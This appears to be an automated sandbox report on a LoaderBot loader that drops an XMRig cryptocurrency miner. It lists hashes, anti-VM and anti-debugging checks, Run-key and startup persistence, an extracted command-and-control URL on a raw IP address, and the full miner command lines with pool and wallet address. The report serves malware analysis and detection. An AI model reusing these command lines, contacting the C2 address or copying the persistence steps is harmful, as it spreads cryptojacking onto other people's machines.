Analysis
-
max time kernel
150s -
max time network
154s -
platform
windows10-2004_x64 -
resource
win10v2004-20230220-en -
resource tags
arch:x64arch:x86image:win10v2004-20230220-enlocale:en-usos:windows10-2004-x64system -
submitted
28-02-2023 17:09
Static task
static1
Behavioral task
behavioral1
Sample
file.exe
Resource
win7-20230220-en
General
-
Target
file.exe
-
Size
6.5MB
-
MD5
310ad4f57eff4a82c55e34a2723dd283
-
SHA1
57aec7958f04644ce076e1c78df730cb698e31ad
-
SHA256
9f7dfb962e2bf51b8635de5abf80bede395c54abdd19ce0e7caa2343667fefe9
-
SHA512
66404b6d1c04cbea7b23321339aa99b0988f6a4a61d64b313e64ccb2fadc362b094a90c98e184927bd97f9993897038bc9fe4c3c07afdd27d632aefe3b5d3877
-
SSDEEP
196608:ly3FwVssRJTy/xr85Z3MBRDnglLOIeyqZ5:lGFWsyu8b96
Malware Config
Extracted
loaderbot
http://92.204.173.86/cmd.php
Signatures
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 1 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ file.exe -
LoaderBot executable 2 IoCs
resource yara_rule behavioral2/memory/4668-135-0x0000000000430000-0x0000000001494000-memory.dmp loaderbot behavioral2/memory/4668-136-0x0000000000430000-0x0000000001494000-memory.dmp loaderbot -
XMRig Miner payload 15 IoCs
resource yara_rule behavioral2/memory/1476-153-0x0000000140000000-0x0000000140B75000-memory.dmp xmrig behavioral2/memory/4840-159-0x0000000140000000-0x0000000140B75000-memory.dmp xmrig behavioral2/memory/4840-160-0x0000000140000000-0x0000000140B75000-memory.dmp xmrig behavioral2/memory/4840-163-0x0000000140000000-0x0000000140B75000-memory.dmp xmrig behavioral2/memory/4840-166-0x0000000140000000-0x0000000140B75000-memory.dmp xmrig behavioral2/memory/4840-167-0x0000000140000000-0x0000000140B75000-memory.dmp xmrig behavioral2/memory/4840-168-0x0000000140000000-0x0000000140B75000-memory.dmp xmrig behavioral2/memory/4840-169-0x0000000140000000-0x0000000140B75000-memory.dmp xmrig behavioral2/memory/1736-174-0x0000000140000000-0x0000000140B75000-memory.dmp xmrig behavioral2/memory/1736-175-0x0000000140000000-0x0000000140B75000-memory.dmp xmrig behavioral2/memory/1736-176-0x0000000140000000-0x0000000140B75000-memory.dmp xmrig behavioral2/memory/1736-177-0x0000000140000000-0x0000000140B75000-memory.dmp xmrig behavioral2/memory/1736-180-0x0000000140000000-0x0000000140B75000-memory.dmp xmrig behavioral2/memory/1736-183-0x0000000140000000-0x0000000140B75000-memory.dmp xmrig behavioral2/memory/1736-184-0x0000000140000000-0x0000000140B75000-memory.dmp xmrig -
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion file.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion file.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-4238149048-355649189-894321705-1000\Control Panel\International\Geo\Nation file.exe -
Drops startup file 1 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Driver.url file.exe -
Executes dropped EXE 3 IoCs
pid Process 1476 Driver.exe 4840 Driver.exe 1736 Driver.exe -
Identifies Wine through registry keys 2 TTPs 1 IoCs
Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-4238149048-355649189-894321705-1000\Software\Wine file.exe -
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-4238149048-355649189-894321705-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Driver = "C:\\Users\\Admin\\AppData\\Roaming\\Sysfiles\\file.exe" file.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
pid Process 4668 file.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 2 IoCs
pid pid_target Process procid_target 2188 1476 WerFault.exe 92 1904 4840 WerFault.exe 97 -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 4668 file.exe 4668 file.exe 4668 file.exe 4668 file.exe 4668 file.exe 4668 file.exe 4668 file.exe 4668 file.exe 4668 file.exe 4668 file.exe 4668 file.exe 4668 file.exe 4668 file.exe 4668 file.exe 4668 file.exe 4668 file.exe 4668 file.exe 4668 file.exe 4668 file.exe 4668 file.exe 4668 file.exe 4668 file.exe 4668 file.exe 4668 file.exe 4668 file.exe 4668 file.exe 4668 file.exe 4668 file.exe 4668 file.exe 4668 file.exe 4668 file.exe 4668 file.exe 4668 file.exe 4668 file.exe 4668 file.exe 4668 file.exe 4668 file.exe 4668 file.exe 4668 file.exe 4668 file.exe 4668 file.exe 4668 file.exe 4668 file.exe 4668 file.exe 4668 file.exe 4668 file.exe 4668 file.exe 4668 file.exe 4668 file.exe 4668 file.exe 4668 file.exe 4668 file.exe 4668 file.exe 4668 file.exe 4668 file.exe 4668 file.exe 4668 file.exe 4668 file.exe 4668 file.exe 4668 file.exe 4668 file.exe 4668 file.exe 4668 file.exe 4668 file.exe -
Suspicious behavior: LoadsDriver 2 IoCs
pid Process 664 Process not Found 664 Process not Found -
Suspicious behavior: RenamesItself 1 IoCs
pid Process 4668 file.exe -
Suspicious use of AdjustPrivilegeToken 7 IoCs
description pid Process Token: SeDebugPrivilege 4668 file.exe Token: SeLockMemoryPrivilege 1476 Driver.exe Token: SeLockMemoryPrivilege 1476 Driver.exe Token: SeLockMemoryPrivilege 4840 Driver.exe Token: SeLockMemoryPrivilege 4840 Driver.exe Token: SeLockMemoryPrivilege 1736 Driver.exe Token: SeLockMemoryPrivilege 1736 Driver.exe -
Suspicious use of WriteProcessMemory 6 IoCs
description pid Process procid_target PID 4668 wrote to memory of 1476 4668 file.exe 92 PID 4668 wrote to memory of 1476 4668 file.exe 92 PID 4668 wrote to memory of 4840 4668 file.exe 97 PID 4668 wrote to memory of 4840 4668 file.exe 97 PID 4668 wrote to memory of 1736 4668 file.exe 103 PID 4668 wrote to memory of 1736 4668 file.exe 103
Processes
-
C:\Users\Admin\AppData\Local\Temp\file.exe"C:\Users\Admin\AppData\Local\Temp\file.exe"1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Drops startup file
- Identifies Wine through registry keys
- Adds Run key to start application
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: RenamesItself
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4668 -
C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 46JP2Vir9Zd4xARGJRWwA7DrzTyV541xXVAnVuR7KnMcSXidE9roEwKWmSCUF1QMygYkLFvRegGxWhTVVgmnQN7dSoA1X9j -p x -k -v=0 --donate-level=1 -t 22⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1476 -
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 1476 -s 7603⤵
- Program crash
PID:2188
-
-
-
C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 46JP2Vir9Zd4xARGJRWwA7DrzTyV541xXVAnVuR7KnMcSXidE9roEwKWmSCUF1QMygYkLFvRegGxWhTVVgmnQN7dSoA1X9j -p x -k -v=0 --donate-level=1 -t 22⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4840 -
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 4840 -s 8683⤵
- Program crash
PID:1904
-
-
-
C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 46JP2Vir9Zd4xARGJRWwA7DrzTyV541xXVAnVuR7KnMcSXidE9roEwKWmSCUF1QMygYkLFvRegGxWhTVVgmnQN7dSoA1X9j -p x -k -v=0 --donate-level=1 -t 22⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1736
-
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 456 -p 1476 -ip 14761⤵PID:3576
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 528 -p 4840 -ip 48401⤵PID:5060
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
3.9MB
MD502569a7a91a71133d4a1023bf32aa6f4
SHA10f16bcb3f3f085d3d3be912195558e9f9680d574
SHA2568d6abba9b216172cfc64b8802db0d20a1c634c96e1049f451eddba2363966bf0
SHA512534be1fe93ee556a14cfd8fad5377f57fb056ab4cd2bca14e4f376f4a25d3d4d270917d68a90b3c40d8a8daaeba6f592fa095ecff478332ba23405d1df728322
-
Filesize
3.9MB
MD502569a7a91a71133d4a1023bf32aa6f4
SHA10f16bcb3f3f085d3d3be912195558e9f9680d574
SHA2568d6abba9b216172cfc64b8802db0d20a1c634c96e1049f451eddba2363966bf0
SHA512534be1fe93ee556a14cfd8fad5377f57fb056ab4cd2bca14e4f376f4a25d3d4d270917d68a90b3c40d8a8daaeba6f592fa095ecff478332ba23405d1df728322
-
Filesize
3.9MB
MD502569a7a91a71133d4a1023bf32aa6f4
SHA10f16bcb3f3f085d3d3be912195558e9f9680d574
SHA2568d6abba9b216172cfc64b8802db0d20a1c634c96e1049f451eddba2363966bf0
SHA512534be1fe93ee556a14cfd8fad5377f57fb056ab4cd2bca14e4f376f4a25d3d4d270917d68a90b3c40d8a8daaeba6f592fa095ecff478332ba23405d1df728322
-
Filesize
3.9MB
MD502569a7a91a71133d4a1023bf32aa6f4
SHA10f16bcb3f3f085d3d3be912195558e9f9680d574
SHA2568d6abba9b216172cfc64b8802db0d20a1c634c96e1049f451eddba2363966bf0
SHA512534be1fe93ee556a14cfd8fad5377f57fb056ab4cd2bca14e4f376f4a25d3d4d270917d68a90b3c40d8a8daaeba6f592fa095ecff478332ba23405d1df728322
-
Filesize
3.9MB
MD502569a7a91a71133d4a1023bf32aa6f4
SHA10f16bcb3f3f085d3d3be912195558e9f9680d574
SHA2568d6abba9b216172cfc64b8802db0d20a1c634c96e1049f451eddba2363966bf0
SHA512534be1fe93ee556a14cfd8fad5377f57fb056ab4cd2bca14e4f376f4a25d3d4d270917d68a90b3c40d8a8daaeba6f592fa095ecff478332ba23405d1df728322